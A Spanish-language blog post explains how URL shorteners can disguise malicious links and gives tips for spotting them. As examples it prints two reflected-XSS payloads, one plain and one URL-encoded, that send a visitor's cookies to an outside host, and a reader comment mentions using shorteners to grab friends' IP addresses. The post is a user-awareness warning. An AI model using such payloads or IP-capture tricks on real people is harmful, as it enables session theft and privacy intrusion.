Hoy en dia, gracias al furor que ha tenido twitter y otras redes sociales, se ha hecho muy comun utilizar paginas que nos brindan el servicio de acortar las direcciones. Este servicio es muy util, ya que nos permiten acortar aquellas urls, que son demasiado largas y que son dificiles de recordar. Su uso es muy sencillo solo basta con entrar a un sitio de tantos en la red que nos dan este servicio como por ejemplo: Bit.ly o tinyurl.com alli en una caja de texto pegamos la url que deseamos recortar damos click en el boton y listo tendremos nuestra url recortada, algo asi como esto:
http://bit.ly/4G4ueH
http://tinyurl.com/ykfuc64
Sin embargo, esto puede llegar a convertirse en un arma de doble filo, debido a que algun individuo de forma malintencionada puede “camuflar” una url infectada con algun troyano, o una url con un script que capture tus cookies (XSS). Y esto como ocurre?? Hay gente que puede caer en un truco tan viejo?? La respuesta es SI. Pongamos un ejemplo, un informatico ve que una nena muy linda, comparte un enlace de este tipo:
http://sitio.com/prueba.php?variable=”><script>document.location=’http://www.lugarscript.com/cgi-bin/cookie.cgi? ‘%20+document.cookie</script>
o este:
http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
Para cualquier persona con sentido comun (bueno eso creo y espero) que vea este enlace, lo va a ver sospechoso y sabra que ese enlace no es lo que dice ser la nena linda. Pero que pasaria si se usa una web que nos recorta la url? Nuestro enlace malicioso quedaria asi:
http://bit.ly/2SOKtG
o asi:
http://bit.ly/3hPNpy
Ahora si, mas de una persona daria click en ese enlace, si la nena linda dice que en esa pequeña url se encuentran sus fotos desnuda. Igualmente suele suceder con el malware, muchas veces viene camuflado de esa forma, y algunas personas dan click sin pensar que hay detras de esa url corta.
Recomendaciones.
- Tener sentido comun, y no dar click en cualquier enlace.
- No visitar enlaces sospechosos compartidos por mujeres voluptuosas o en su defecto hombres.
- Antes de dar click en una url de este tipo, pase el puntero por el enlace, y este le va a mostrar la verdadera url, de tal forma, sabras hacia donde te lleva el enlace.
Estas son pequeñas cosas, pero que muchos usuarios de la red no lo saben, y son blancos faciles de todo el malware que existe en la red.
Valora en Bitacoras.com: Hoy en dia, gracias al furor que ha tenido twitter y otras redes sociales, se ha hecho muy comun utilizar paginas que nos brindan el servicio de acortar las direcciones. Este servicio es muy util, ya que nos permiten ac…
Yo he utilizado los acortadores de url’s también para coger la ip de mis friends